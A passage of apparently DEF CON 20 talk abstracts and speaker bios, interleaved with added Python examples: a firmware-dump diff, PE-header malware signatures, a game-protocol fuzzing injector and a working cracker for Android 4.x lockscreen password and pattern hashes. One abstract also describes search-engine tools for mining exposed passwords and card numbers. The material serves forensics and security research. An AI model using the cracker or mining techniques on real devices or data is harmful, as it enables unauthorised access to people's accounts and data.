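The defender's takeaway is the last sentence: a wiped disk and fresh OS prove nothing if the flash part was never examined. The Python below is an added example (not part of the talk and not Rakshasa code) of the minimal firmware check a post-intrusion process needs: hash the dump of the flash part, diff it block by block against a known-good image from the same board, and separate the blocks that legitimately change between boots (NVRAM variable store, event log, CMOS-backed settings) from the ones that should never change. The two images are constructed inside the script; the offsets, the 512 KiB size and the 4 KiB block size are demo assumptions, not values from any real board.

```python
import hashlib
from typing import List, Sequence, Tuple

Region = Tuple[int, int]  # (offset, length) in bytes


def sha256_hex(image: bytes) -> str:
    """Fingerprint a dump so it can be compared with a vendor- or self-recorded baseline."""
    return hashlib.sha256(image).hexdigest()


def changed_regions(baseline: bytes, sample: bytes, block_size: int = 4096) -> List[Region]:
    """Compare two flash dumps block by block and coalesce differing blocks into
    (offset, length) ranges. Both dumps must be of the same part, read with the
    same tool and the same layout, or the offsets will not line up."""
    if len(baseline) != len(sample):
        raise ValueError(f"image sizes differ: {len(baseline)} vs {len(sample)}")
    regions: List[Region] = []
    start = None
    for off in range(0, len(baseline), block_size):
        differs = baseline[off:off + block_size] != sample[off:off + block_size]
        if differs and start is None:
            start = off
        elif not differs and start is not None:
            regions.append((start, off - start))
            start = None
    if start is not None:
        regions.append((start, len(baseline) - start))
    return regions


def filter_volatile(regions: Sequence[Region], volatile: Sequence[Region]) -> List[Region]:
    """Drop changes that fall entirely inside ranges expected to change between boots.
    Whatever is left is unexplained and needs analysis: a modified boot block or SMM
    handler is exactly the footprint a Rakshasa-style implant leaves."""
    def inside(region: Region, vol: Region) -> bool:
        r_off, r_len = region
        v_off, v_len = vol
        return r_off >= v_off and r_off + r_len <= v_off + v_len
    return [r for r in regions if not any(inside(r, v) for v in volatile)]


def triage(baseline: bytes, sample: bytes, volatile: Sequence[Region] = (),
           block_size: int = 4096) -> dict:
    """One-shot report for a suspect dump against its baseline."""
    regions = changed_regions(baseline, sample, block_size)
    return {
        "baseline_sha256": sha256_hex(baseline),
        "sample_sha256": sha256_hex(sample),
        "changed": regions,
        "unexplained": filter_volatile(regions, volatile),
    }


def build_sample_images() -> Tuple[bytes, bytes]:
    """Constructed 512 KiB images standing in for a known-good baseline and a dump
    from a suspect machine. Not real firmware; offsets chosen for the demo."""
    size = 512 * 1024
    baseline = bytes(range(256)) * (size // 256)
    tampered = bytearray(baseline)
    tampered[0x10000:0x10010] = b"\x90" * 16            # patched code inside a module
    tampered[0x70010:0x70018] = b"\x01\x02\x03\x04" * 2  # counter bump in the NVRAM area (expected)
    tampered[0x7F000:0x7F004] = b"\xCC" * 4              # change in the last (boot) block
    return baseline, bytes(tampered)


if __name__ == "__main__":
    base, suspect = build_sample_images()
    report = triage(base, suspect, volatile=[(0x70000, 0x1000)])
    print("baseline  ", report["baseline_sha256"])
    print("sample    ", report["sample_sha256"])
    for off, length in report["unexplained"]:
        print(f"unexplained change at {off:#08x} ({length} bytes)")
```

Take the dumps with an external programmer where you can; a dump made through the running OS passes through the very firmware you suspect. Keep the baseline image and its hash from the day the board was commissioned, because a vendor download is not necessarily the build that shipped on your board.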



Jonathan Brossard is a security research engineer. Born in France, he lived in Brazil and India before settling in Australia, where he currently works. With about 15 years of assembly experience, he specialises in low-level security, from raw sockets to cryptography and memory corruption bugs. He is currently CEO and security consultant at the Toucan System security company. His clients include some of the biggest defense and financial institutions worldwide. Jonathan is also the co-organiser of the Hackito Ergo Sum conference (HES) in France.

Twitter: @endrazine

Facebook: toucansystem


DIY Electric Car

Electric Vehicles are an exciting area of developing technology entering the mainstream market. Every major manufacturer is working on new hybrid and electric vehicles but prices will be high and options few for years to come.



As with many industries, a DIY approach can yield similar results for much less cost, while creating something truly unique.



This talk will explore the possibilities and procedures involved in creating your own electric vehicle. Topics addressed will include the whys and hows, with an emphasis on the options available to tailor your conversion to match your time, budget, and performance needs.



Dave Brown is an IT Security Consultant with Booz Allen Hamilton. In his free time he tries to build stuff, and is particularly interested in alternative energy. In 2010 he converted a ’74 VW Beetle to run on electricity, improving performance and eliminating the need to gas up.




Tenacious Diggity: Skinny Dippin' in a Sea of Bing

All brand new tool additions to the Google Hacking Diggity Project - The Next Generation Search Engine Hacking Arsenal. As always, all tools are free for download and use.

When last we saw our heroes, the Diggity Duo had demonstrated how search engine hacking could be used to take over someone’s Amazon cloud in less than 30 seconds, build out an attack profile of the Chinese government’s external networks, and even download all of an organization’s Internet facing documents and mine them for passwords and secrets. Google and Bing were forced to hug it out, as their services were seamlessly combined to identify which of the most popular websites on the Internet were unwittingly being used as malware distribution platforms against their own end-users.



Now, we've traveled through space and time, my friend, to rock this house again...



True to form, the legendary duo have toiled night and day in the studio (a one room apartment with no air conditioning) to bring you an entirely new search engine hacking tool arsenal that’s packed with so much tiger blood and awesome-sauce, that it’s banned on 6 continents. Many of these new Diggity tools are also fueled by the power of the cloud and provide you with vulnerability data faster and easier than ever thanks to the convenience of mobile applications. Just a few highlights of new tools to be unveiled are:



* AlertDiggityDB – For several years, we’ve collected vulnerability details and sensitive information disclosures from thousands of real-time RSS feeds setup to monitor Google, Bing, SHODAN, and various other search engines. We consolidated this information into a single database, the AlertDiggityDB, forming the largest consolidated repository of live vulnerabilities on the Internet. Now it’s available to you.



* Diggity Dashboard – An executive dashboard of all of our vulnerability data collected from search engines. Customize charts and graphs to create tailored views of the data, giving you the insight necessary to secure your own systems. This web portal provides users with direct access to the most current version of the AlertDiggityDB.



* Bing Hacking Database (BHDB) 2.0 – Exploiting recent API changes and undocumented features within Bing, we’ve been able to completely overcome the previous Bing hacking limitations to create an entirely new BHDB that will make Bing hacking just as effective as Google hacking (if not more so) for uncovering vulnerabilities and data leaks on the web. This also will include an entirely new SharePoint Bing Hacking database, containing attack strings targeting Microsoft SharePoint deployments via Bing.



* NotInMyBackYardDiggity – Don’t be the last to know if LulzSec or Anonymous post data dumps of your company’s passwords on PasteBin.com, or if a reckless employee shares an Excel spreadsheet with all of your customer data on a public website. This tool leverages both Google and Bing, and comes with pre-built queries that make it easy for users to find sensitive data leaks related to their organizations that exist on 3rd party sites, such as PasteBin, YouTube, and Twitter. Uncover data leaks in documents on popular cloud storage sites like Dropbox, Microsoft SkyDrive, and Google Docs. A must have for organizations that have sensitive data leaks on domains they don’t control or operate.



* PortScanDiggity – How would you like to get Google to do your port scanning for you? Using undocumented functionality within Google, we’ve been able to turn Google into an extremely effective network port scanning tool. You can provide domains, hostnames, and even IP address ranges to scan in order to identify open ports ranging across all 65,535 TCP ports. An additional benefit is that this port scanning is completely passive – no need to directly communicate with target networks since Google has already performed the scanning for you.



* CloudDiggity Data Mining Tool Suite – Ever wanted to data mine every single password, email, SSN, credit card number on the Internet? Our new cloud tools combine Google/Bing hacking and data loss prevention (DLP) scanning on a massive scale, made possible via the power of cloud computing. Chuck Norris approved.



* CodeSearchDiggity-Cloud Edition – Google recently shut down Code Search in favor of focusing on Google+, putting “more wood behind fewer arrows”. I suppose we could have let the matter go, and let CodeSearchDiggity die, but that would be the mature thing to do. Instead, we are harnessing the power of the cloud to keep the dream alive – i.e. performing source code security analysis of nearly every single open source code project in existence, simultaneously.



* BingBinaryMalwareSearch (BBMS) – According to the Verizon 2012 DBIR, malware was used to compromise a staggering 95% of all records breached for 2011. BBMS allows users to proactively track down and block sites distributing malware executables on the web. The tool leverages Bing, which indexes executable files, to find malware based on executable file signatures (e.g. “Time Stamp Date:”, “Size of Code:”, and “Entry Point:”).



* Diggity IDS – Redesigned intrusion detection system (IDS) for search engine hacking. Will still leverage the wealth of information provided by the various Diggity Alert RSS feeds, but will also make more granular data slicing and dicing possible through new and improved client tools. Also includes the frequently requested SMS/email alerting capabilities, making it easier than ever for users to keep tabs on their vulnerability exposure via search engines.



So come ready to engage us as we explore these tools and more in this DEMO rich presentation. You are cordially invited to ride the lightning.
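The BingBinaryMalwareSearch entry above rests on one mechanical step: Bing indexes executables, so header fields such as "Time Stamp Date", "Size of Code" and "Entry Point" become searchable text. As an added example (not Diggity code), the Python below extracts exactly those three fields from a PE header and checks a file against a known-bad triple, which is the local side of the same idea. The minimal PE it parses is constructed inline; the IMAGE_FILE_HEADER and IMAGE_OPTIONAL_HEADER offsets follow the PE/COFF specification; the text rendering in signature_lines() is my own assumption about how such a signature is written, since the page does not show Bing's indexed form.

```python
import struct
from datetime import datetime, timezone
from typing import Dict, List

IMAGE_NT_OPTIONAL_HDR32_MAGIC = 0x10B
IMAGE_NT_OPTIONAL_HDR64_MAGIC = 0x20B


def pe_signature_fields(data: bytes) -> Dict[str, int]:
    """Extract TimeDateStamp, SizeOfCode and AddressOfEntryPoint from a PE image.
    Layout per the PE/COFF spec: e_lfanew at 0x3C in the DOS header, the 4-byte
    "PE\\0\\0" signature, a 20-byte IMAGE_FILE_HEADER, then the optional header,
    whose first 20 bytes are identical for PE32 and PE32+."""
    try:
        if data[:2] != b"MZ":
            raise ValueError("missing MZ signature")
        e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
        if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
            raise ValueError("missing PE signature")
        coff = e_lfanew + 4
        # Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
        # NumberOfSymbols, SizeOfOptionalHeader, Characteristics
        machine, _, time_stamp, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, coff)
        if opt_size < 20:
            raise ValueError("optional header too short")
        # Magic, MajorLinkerVersion, MinorLinkerVersion, SizeOfCode,
        # SizeOfInitializedData, SizeOfUninitializedData, AddressOfEntryPoint
        magic, _, _, size_of_code, _, _, entry_point = struct.unpack_from("<HBBIIII", data, coff + 20)
    except struct.error as exc:
        raise ValueError(f"truncated PE header: {exc}") from None
    if magic not in (IMAGE_NT_OPTIONAL_HDR32_MAGIC, IMAGE_NT_OPTIONAL_HDR64_MAGIC):
        raise ValueError(f"unexpected optional header magic {magic:#x}")
    return {"machine": machine, "time_stamp": time_stamp,
            "size_of_code": size_of_code, "entry_point": entry_point}


def signature_lines(fields: Dict[str, int]) -> List[str]:
    """Render the three fields the way a search query would name them. The exact
    text Bing indexes is not documented on this page; this layout is assumed."""
    when = datetime.fromtimestamp(fields["time_stamp"], tz=timezone.utc)
    return [f"Time Stamp Date: {when:%Y-%m-%d %H:%M:%S}",
            f"Size of Code: {fields['size_of_code']:#x}",
            f"Entry Point: {fields['entry_point']:#x}"]


def matches_signature(data: bytes, time_stamp: int, size_of_code: int, entry_point: int) -> bool:
    """True when a file carries a known-bad (timestamp, code size, entry point) triple.
    All three are written by the linker, so a rebuilt or repacked sample changes them:
    treat a match as a lead to block and verify, not as proof on its own."""
    try:
        f = pe_signature_fields(data)
    except ValueError:
        return False
    return (f["time_stamp"], f["size_of_code"], f["entry_point"]) == (time_stamp, size_of_code, entry_point)


def build_sample_pe() -> bytes:
    """Constructed minimal PE32 header (no sections, not loadable) for the demo."""
    dos = bytearray(0x80)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x80)  # e_lfanew -> PE signature
    file_hdr = struct.pack("<HHIIIHH", 0x14C, 1, 1341000000, 0, 0, 0xE0, 0x0102)
    opt_hdr = struct.pack("<HBBIIII", 0x10B, 9, 0, 0x1200, 0x400, 0, 0x1380)
    opt_hdr += b"\0" * (0xE0 - len(opt_hdr))
    return bytes(dos) + b"PE\0\0" + file_hdr + opt_hdr


if __name__ == "__main__":
    sample = build_sample_pe()
    for line in signature_lines(pe_signature_fields(sample)):
        print(line)
    print("known-bad match:", matches_signature(sample, 1341000000, 0x1200, 0x1380))
```

Point pe_signature_fields() at files from a proxy cache or mail quarantine and you have the same triple a search engine exposes, without shipping the sample anywhere.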



Francis Brown CISA, CISSP, MCSE, is a Managing Partner at Stach & Liu, a security consulting firm providing IT security services to the Fortune 500 and global financial institutions as well as U.S. and foreign governments. Before joining Stach & Liu, Francis served as an IT Security Specialist with the Global Risk Assessment team of Honeywell International where he performed network and application penetration testing, product security evaluations, incident response, and risk assessments of critical infrastructure. Prior to that, Francis was a consultant with the Ernst & Young Advanced Security Centers and conducted network, application, wireless, and remote access penetration tests for Fortune 500 clients.



Francis has presented his research at leading conferences such as Black Hat USA, DEF CON, InfoSec World, ToorCon, and HackCon and has been cited in numerous industry and academic publications.



Francis holds a Bachelor of Science and Engineering from the University of Pennsylvania with a major in Computer Science and Engineering and a minor in Psychology. While at Penn, Francis taught operating system implementation, C programming, and participated in DARPA-funded research into advanced intrusion prevention system techniques.

Facebook: StachLiu





Rob Ragan is a Senior Security Associate at Stach & Liu, a specialized security consulting firm serving the Fortune 1000 and high-tech startups. We protect our clients from the bad guys by breaking-in and bending the rules before the hackers do. From critical infrastructure to credit cards, popular websites to mobile games, and flight navigation systems to frozen waffle factories, we're there.



Before joining Stach & Liu, Rob served as a Software Engineer with the Application Security Center team of Hewlett-Packard (formerly SPI Dynamics) where he developed automated web application security testing tools, performed penetration tests, and researched vulnerability assessment and identification techniques. Rob has presented his research at leading conferences such as Black Hat, DEF CON, SummerCon, InfoSec World, HackCon, OuterZ0ne, and HackerHalted. He has published several white papers and is a contributing author to the Hacking Exposed: Web Applications 3rd edition.

Twitter: @sweepthatleg

Facebook: StachLiu



KinectasploitV2: Kinect Meets 20 Security Tools

Last year saw the release of Kinectasploit v1 linking the Kinect with Metasploit in a 3D, first person shooter environment. What if we expanded Kinectasploit to use 20 security tools in honor of DEF CON's 20th anniversary?!



Jeff Bryner has toiled for over 20 years integrating systems, performing incident response and forensics and ultimately fixing security issues. He writes for the SANS forensic blog, has spoken at RSA on SCADA security issues and at DEF CON 18 on privacy issues with the Google Toolbar, released Kinectasploit v1 at DEF CON 19 and runs p0wnlabs.com just for fun.

Twitter: @p0wnlabs

p0wnlabs.com


Fuzzing Online Games

Fuzzing online games to find interesting bugs requires a unique set of novel techniques.



In a nutshell, the lack of direct access to the game server and having to deal with clients that are far too complex to be easily emulated force us to rely on injecting fuzzing data into a legitimate connection rather than using the standard replay execution approach. Top that with heavily encrypted and complex network protocols and you start to see why we had to become creative to succeed :)



In this talk, we will discuss and illustrate the novel techniques we had to develop to be able to fuzz online games, including how to successfully inject data into a gaming session and how to instrument the game's memory to know that our fuzzing was successful. We will also tell you how to find and reverse the interesting part of the protocol, and how to decide when to perform the injection.
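The abstract's central move is to mutate messages inside a live session instead of replaying a capture. The Python below is an added example (not the authors' tooling) of what that requires at the wire level: split the session into frames, mutate only the opcode you are targeting, re-frame it (length and checksum) so both ends keep parsing, and arm injection only after a chosen message (say, login complete) has gone by, which is the "when to inject" decision. The framing used here (u16 length, u8 opcode, XOR checksum) is a constructed toy protocol, not any real game's, and the memory instrumentation the talk uses as its success oracle is out of scope.

```python
import random
from typing import Callable, List, Optional, Tuple

# Constructed toy wire format (not any real game's protocol):
#   u16 big-endian length of (opcode + payload + checksum)
#   u8  opcode
#   payload
#   u8  checksum = XOR of opcode and payload bytes
# The length prefix and checksum are why in-line mutation must re-frame: flipping a
# byte in the raw stream desynchronises the parser on both sides of the connection.


def checksum(body: bytes) -> int:
    x = 0
    for b in body:
        x ^= b
    return x


def encode(opcode: int, payload: bytes) -> bytes:
    body = bytes([opcode]) + payload
    return (len(body) + 1).to_bytes(2, "big") + body + bytes([checksum(body)])


def decode_stream(stream: bytes) -> List[Tuple[int, bytes]]:
    """Split a byte stream into (opcode, payload) frames, rejecting bad framing."""
    msgs: List[Tuple[int, bytes]] = []
    off = 0
    while off < len(stream):
        if off + 2 > len(stream):
            raise ValueError(f"truncated length field at {off}")
        n = int.from_bytes(stream[off:off + 2], "big")
        frame = stream[off + 2:off + 2 + n]
        if n < 2 or len(frame) != n:
            raise ValueError(f"bad frame at {off}")
        body, csum = frame[:-1], frame[-1]
        if checksum(body) != csum:
            raise ValueError(f"bad checksum at {off}")
        msgs.append((body[0], body[1:]))
        off += 2 + n
    return msgs


def byte_flip_mutator(seed: int, flips: int = 2) -> Callable[[bytes], bytes]:
    """Seeded so a crash can be reproduced from the seed alone."""
    rng = random.Random(seed)

    def mutate(payload: bytes) -> bytes:
        buf = bytearray(payload)
        for _ in range(flips):
            if not buf:
                break
            i = rng.randrange(len(buf))
            buf[i] ^= rng.randrange(1, 256)
        if rng.random() < 0.5:  # sometimes grow the field to probe length handling
            buf += bytes(rng.randrange(256) for _ in range(rng.randrange(1, 9)))
        return bytes(buf)

    return mutate


def inject_fuzz(stream: bytes, target_opcode: int, mutate: Callable[[bytes], bytes],
                arm_after_opcode: Optional[int] = None) -> Tuple[bytes, int]:
    """Rewrite a forwarded session: every frame passes through untouched except those
    with target_opcode, which are mutated and re-framed. With arm_after_opcode set,
    injection stays disarmed until that opcode has been seen, so the handshake and
    login complete before fuzzing starts. Returns (rewritten stream, frames mutated)."""
    armed = arm_after_opcode is None
    out = bytearray()
    mutated = 0
    for opcode, payload in decode_stream(stream):
        if not armed:
            if opcode == arm_after_opcode:
                armed = True
        elif opcode == target_opcode:
            payload = mutate(payload)
            mutated += 1
        out += encode(opcode, payload)
    return bytes(out), mutated


if __name__ == "__main__":
    # Constructed session: login, a movement update, a chat line, another update.
    session = encode(0x01, b"login:alice") + encode(0x10, b"\x00\x01\x02\x03") \
        + encode(0x20, b"hello") + encode(0x10, b"\x09\x08")
    out, n = inject_fuzz(session, 0x10, byte_flip_mutator(seed=7), arm_after_opcode=0x01)
    print(f"mutated {n} frame(s); rewritten stream parses into {len(decode_stream(out))} frames")
```

In a real deployment the same function sits in a MITM proxy between client and server (after the transport encryption has been dealt with, which the abstract flags as the hard part), and the seed of each mutation is logged alongside the memory-instrumentation result so a finding can be replayed.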



Elie Bursztein is a researcher at Google's Mountain View, Calif. headquarters, where he invents ways to fix the Internet's security and privacy problems. Prior to that as a researcher at Stanford University, Elie designed Wikipedia's CAPTCHA and created Talisman, a Chrome browser extension that enhances security. He is also the inventor of the award-winning game hacking tool Kartograph presented at DEF CON 18 and Security and Privacy 2011.

Twitter: @elie

http://elie.im



Patrick Samy is a research engineer at Stanford University where he focuses on hardware and system security. He is the lead developer of the Kartograph network and scripting engine. He also developed the Kartograph real-time visualization engine.




The Open Cyber Challenge Platform

Everyone from MIT to the DoD has agreed that teaching cyber security using cyber challenges, where groups of students attack or defend a live network, is an incredibly effective educational tactic. Unfortunately, current cyber challenge tools suffer from being very hard to configure, very expensive, and/or limited to certain audiences (e.g. the military), which makes them inaccessible to high schools, colleges, and smaller organizations. The Open Cyber Challenge Platform aims to help fix this by providing a free, open-source cyber challenge software platform that is reasonable in terms of the cost of the required hardware and the technical installation/maintenance expertise required, and easily extensible so that the vast open source community can provide additional modules that reflect new challenges and scenarios. If you're interested in the future of cyber-security education, or simply want to learn about a new potential training tool, come check out the OCCP.



Linda C. Butler is a computer science student currently interning at the University of Rhode Island's Digital Forensics and Cyber Security Program. Past activities include an internship in the NASA Engineering department at Kennedy Space Center, a backpacking trip through New Zealand, and performing at a renaissance faire. She's an OWASP member and past DEFCON Attendee, and finds the interaction between security, privacy, and society an endlessly fascinating area of study.




Into the Droid: Gaining Access to Android User Data

This talk details a selection of techniques for getting the data out of an Android device in order to perform forensic analysis. It covers cracking lockscreen passwords, creating custom forensic ramdisks, bypassing bootloader protections and stealth real-time data acquisition. We’ll even cover some crazy techniques - they may get you that crucial data when nothing else will work, or they may destroy the evidence!



Forensic practitioners are well acquainted with push-button forensics software. They are an essential tool to keep on top of high case loads – plug in the device and it pulls out the data. Gaining access to that data is a constant challenge against sophisticated protection being built into modern smartphones. Combined with the diversity of firmware and hardware on the Android platform it is not uncommon to require some manual methods and advanced tools to get the data you need.



This talk will reveal some of the techniques forensic software uses behind the scenes, and will give some insight into what methods and processes blackhats and law enforcement have at their disposal to get at your data. Free and Open Source tools will be released along with this talk to help you experiment with the techniques discussed.



Note that this talk does not discuss Android analysis basics such as how to use ADB or what the SDK is - it is assumed you know these or can easily look them up afterwards.
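One of the techniques the abstract lists, cracking the lockscreen credential offline, can be shown concretely for the Android 4.x scheme in AOSP's LockPatternUtils: password.key holds the upper-case hex SHA-1 and MD5 of password || Long.toHexString(lockscreen.password_salt), and gesture.key holds the raw SHA-1 of the pattern's cell indices. The Python below is an added example (not viaForensics' tool) of cracking both files. It assumes you have already pulled /data/system/password.key or gesture.key and the salt from the settings database, which needs root or a custom recovery/ramdisk as the talk describes, and it applies only to devices of that era: later Android releases changed how the credential is stored.

```python
import hashlib
from itertools import permutations
from typing import Iterable, Optional, Sequence, Tuple

MASK64 = (1 << 64) - 1  # Java long -> Long.toHexString() renders two's complement unsigned


def android_password_hash(password: str, salt: int) -> str:
    """Android 4.x LockPatternUtils.passwordToHash(): the signed 64-bit salt from the
    settings database is rendered with Long.toHexString() (lower-case, unsigned),
    appended to the password, and the upper-case hex SHA-1 and MD5 of that string
    are concatenated (40 + 32 chars) and written to /data/system/password.key."""
    salted = (password + format(salt & MASK64, "x")).encode()
    return (hashlib.sha1(salted).hexdigest() + hashlib.md5(salted).hexdigest()).upper()


def crack_password_key(password_key: str, salt: int, candidates: Iterable[str]) -> Optional[str]:
    """Dictionary attack on the contents of password.key. Only the SHA-1 half is
    computed per candidate; the MD5 half is checked on a hit to rule out a fluke."""
    target = password_key.strip().upper()
    if len(target) != 72:
        raise ValueError("password.key should hold 40 hex SHA-1 + 32 hex MD5 characters")
    sha1_part, md5_part = target[:40], target[40:]
    salt_hex = format(salt & MASK64, "x").encode()
    for pw in candidates:
        salted = pw.encode() + salt_hex
        if hashlib.sha1(salted).hexdigest().upper() == sha1_part:
            if hashlib.md5(salted).hexdigest().upper() == md5_part:
                return pw
    return None


def android_gesture_hash(pattern: Sequence[int]) -> bytes:
    """gesture.key: raw 20-byte SHA-1 over the sequence of cell indices (0-8,
    row-major) of the unlock pattern (LockPatternUtils.patternToHash()). No salt."""
    return hashlib.sha1(bytes(pattern)).digest()


def crack_gesture_key(gesture_key: bytes, min_len: int = 4, max_len: int = 9) -> Optional[Tuple[int, ...]]:
    """Exhaust every ordered selection of distinct cells. Android also forbids
    jumping over an unvisited cell, so this is a superset of valid patterns
    (~986k candidates at max_len=9, a few seconds in CPython); unsalted SHA-1
    is what makes a full search cheap."""
    for n in range(min_len, max_len + 1):
        for pattern in permutations(range(9), n):
            if hashlib.sha1(bytes(pattern)).digest() == gesture_key:
                return pattern
    return None


if __name__ == "__main__":
    # Constructed inputs standing in for the pulled files and salt.
    salt = -5485453542533451562
    stolen_password_key = android_password_hash("hunter2", salt)
    print("password:", crack_password_key(stolen_password_key, salt, ["123456", "password", "hunter2"]))
    stolen_gesture_key = android_gesture_hash([0, 1, 2, 5, 8])
    print("pattern: ", crack_gesture_key(stolen_gesture_key))
```

The pattern search finishes in seconds because there is no salt and no stretching; the password file only resists a plain rainbow table because of the per-device salt, and a wordlist plus the salt still runs at full SHA-1 speed, which is why the talk pairs this with acquisition methods rather than treating the hash as the obstacle.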



Thomas Cannon is the Director of Research and Development for viaForensics, a Chicago based digital forensics and security company. Thomas spends the majority of his time researching new mobile security, malware and forensics techniques and getting them into the hands of customers for commercial, research or military application. He conducts penetration testing and code analysis of mobile applications for clients in industries such as banking/finance and retail.



Thomas is known for his research on Android having published advisories for new vulnerabilities and demonstrated attacks on the platform as well as providing some early guides on reverse engineering Android applications. Thomas has spoken at international conferences and presented to law enforcement on the topic of mobile forensics. Thomas has had a number of articles published in industry magazines and also been interviewed on national news programmes regarding vulnerabilities in payment systems and mobile technology.

Twitter: @thomas_cannon

https://viaforensics.com

http://thomascannon.net


Panel: Meet the Feds 1 - Law Enforcement

Did you ever wonder if the Feds were telling you the truth when you asked a question? Join current and former federal agents from numerous agencies to discuss cyber investigations and answer your burning questions. Enjoy the opportunity to grill ‘em and get down to the bottom of things!



Agencies that will have representatives include: Defense Cyber Crime Center (DC3), National White Collar Crime Center (NW3C), US Department of the Treasury, Internal Revenue Service (IRS), and the US Navy SEALs. This year, the “Meet the Feds” panel has gone Hollywood with special guests - Mr. David McCallum and Mr. Leon Carroll from CBS’s NCIS!



Each of the agency reps will make an opening statement regarding their agency's role, and then open it up to the audience for questions.



Jim Christy is a retired special agent who specialized in cyber crime investigations and digital forensics for over 26 years with the Air Force Office of Special Investigations, with over 40 years of federal service. Jim returned to the federal government first as an IPA and now as an HQE, and is the Director of Futures Exploration (FX) for the Department of Defense Cyber Crime Center (DC3). FX, the DC3 innovation incubator, is responsible for outreach/marketing and strategic relationships with other government organizations, the private sector, and academia for DC3. He was profiled in Wired Magazine in January 2007.



Jim consulted with David Marconi (writer of Enemy of the State, Mission Impossible 2 & Live Free or Die Hard) and contributed technical advice on critical infrastructure attacks used in the movie Live Free or Die Hard.



In May 2011, the Air Force graduated the first NCOs for a new AF career field, Cyber Defense Operations, at Keesler AFB, MS. The staff of the course honored Jim by presenting the top graduate of the class with the “Jim Christy Award”. In 2006, Christy created the DC3 Digital Forensics Challenge, an international competition that in 2011 had 1,800 participants spanning all 50 states and 53 countries. The exercises are designed to develop, hone, and engage participants in the fields of cyber investigation, digital forensics, and cyber security. It is one of the first venues to employ crowdsourcing in “real world” mission-focused solution development.



In Oct 2003, the Association of Information Technology Professionals awarded Jim the 2003 Distinguished Information Science Award winner for his outstanding contribution through distinguished services in the field of information management. Previous recipients of this prestigious award include Admiral Grace Hopper, Gene Amdahl, H. Ross Perot, General Emmett Paige, Bill Gates, Lawrence Ellison, David Packard and Mitch Kapor.



From 17 Sep 01 – 1 Nov 03, Jim was the Deputy Director/Director of Operations, Defense Computer Forensics Lab, DC3. As the Dir of Ops for the DCFL he managed four sections with over 40 computer forensic examiners that supported Major Crimes & Safety, Counterintelligence and Counterterrorism, as well as Intrusions and Information Assurance cases for the Department of Defense.



Leon Carroll grew up in Chicago and graduated from North Dakota State University (where he played on college Division II National Championship football teams). He served 6 years in the Marines and then continued in the Marine Reserves in Long Beach (under the command of PV Sunset member Lt Col Jacques Naviaux).



Carroll was a member of the U.S. Marine Corps when he joined NCIS in 1980. Leon worked at a halfway house for pre-release felons in Fargo, North Dakota, and then became a special agent with the Naval Investigative Service, later known as the Naval Criminal Investigative Service (NCIS), serving in several places including Panama and aboard the USS Ranger.



He retired two decades later, but returned after 9/11, serving another year and a half to help with the agency's expanded role in counter-terrorism. After his second retirement, he and his wife moved to the Los Angeles area.



As a retired NCIS agent with over 20 years of experience, Mr. Carroll received an unexpected opportunity to work as a technical adviser to the NCIS TV program in Los Angeles. He was recruited in 2003 by the producers who said they needed someone who could provide the show with the “spit-polish shine of authenticity.”



Working on both NCIS and NCIS Los Angeles, Mr. Carroll is a technical adviser to the script writers, actors and director, and has also written scripts for a few episodes himself. He works under the leadership of Mark Hyman of football fame. They do 24 episodes per season.



Andy Fried is a Senior Consultant with Cutter Consortium's Business Technology Strategies and Government & Public Sector practices. His unique skill set has earned him a worldwide reputation; his background includes working as a uniformed police officer, a computer programmer and security analyst, and a Senior Special Agent with the US Department of the Treasury, a post he retired from after a 20-year career. Mr. Fried's extensive knowledge allows him to identify large data sources that are seemingly unrelated and combine them to produce findings that would not be otherwise identified. His passion and tenacity for identifying and stopping Internet criminal activity has earned him the respect of leading industry experts. During his last two years at the US Treasury, Mr. Fried was credited with identifying and mitigating over 3,000 fraudulent online schemes. He currently works as a security researcher for a nonprofit organization involved in identifying organized criminal enterprises responsible for fraudulent schemes, denial-of-service attacks, malware propagation, and large-scale botnets. Mr. Fried's work routinely involves data mining and analysis of data sets that contain hundreds of millions of records.



Early in his career, Mr. Fried was a programmer for Bionetics, a life sciences medical research group at the Kennedy Space Center, where he became a technology evangelist, identifying work processes that could be automated, conducting R&D for new computer hardware and software programs, and assisting biostatisticians in aggregating and processing the voluminous research data generated by data acquisition systems. At Bionetics, Mr. Fried was tasked with providing technical support to NASA's Internal Security Office, including one high-profile case involving the arrest and investigation of a kidnapper/rapist. At NASA's suggestion, he moved from Bionetics into a computer security analyst position within the newly formed Lockheed Space Operations Corporation (LSOC). He soon became involved in processing and analyzing digital data related to the kidnapping/rape investigation and developed a suite of forensic software programs. His software became the first set of programs designed specifically for use by law enforcement and was adopted by the FBI, IRS, and Air Force Office of Special Investigations. Soon after, the IRS recruited Mr. Fried for a Special Agent position, citing a need to develop the capability to detect, investigate, and prosecute computer-related crimes. He went on to help establish the Criminal Investigation Division's Computer Investigative Specialist (CIS) program, a similar program for IRS Inspection, the System Intrusion and Network Attack Response Team (SINART), and the Computer Security Incident Response Capability (CSIRC).



More recently, Mr. Fried developed databases and innovative techniques to proactively detect online schemes targeting the IRS. He identified various sources of intelligence and information, developed strategic alliances with private organizations, and designed automated systems to obtain and analyze large data sets for the purpose of identifying and mitigating online schemes. Mr. Fried also designed, developed, and implemented his agency's network-based digital video surveillance system. He additionally developed strategic alliances with a large number of domain registrars, ISPs, government- sponsored CERTs, and private organizations involved in various forms of network security for the purpose of increasing the ability to mitigate fraudulent behavior as quickly as possible. In 2008, Mr. Fried presented a proposal to IRS management to form a new division whose sole mission was to monitor, detect, and mitigate online fraudulent schemes targeting the IRS and US taxpayers. The proposal was adopted and led to the formation of IRS Online Fraud Detection and Prevention (OFDP).



Mr. Fried is on the executive board of directors of the Fraternal Order of Police in Washington, DC, and is affiliated with several security organizations that cannot be named. He is a frequent presenter at Black Hat and DEF CON. Mr. Fried has a BS degree in criminology.



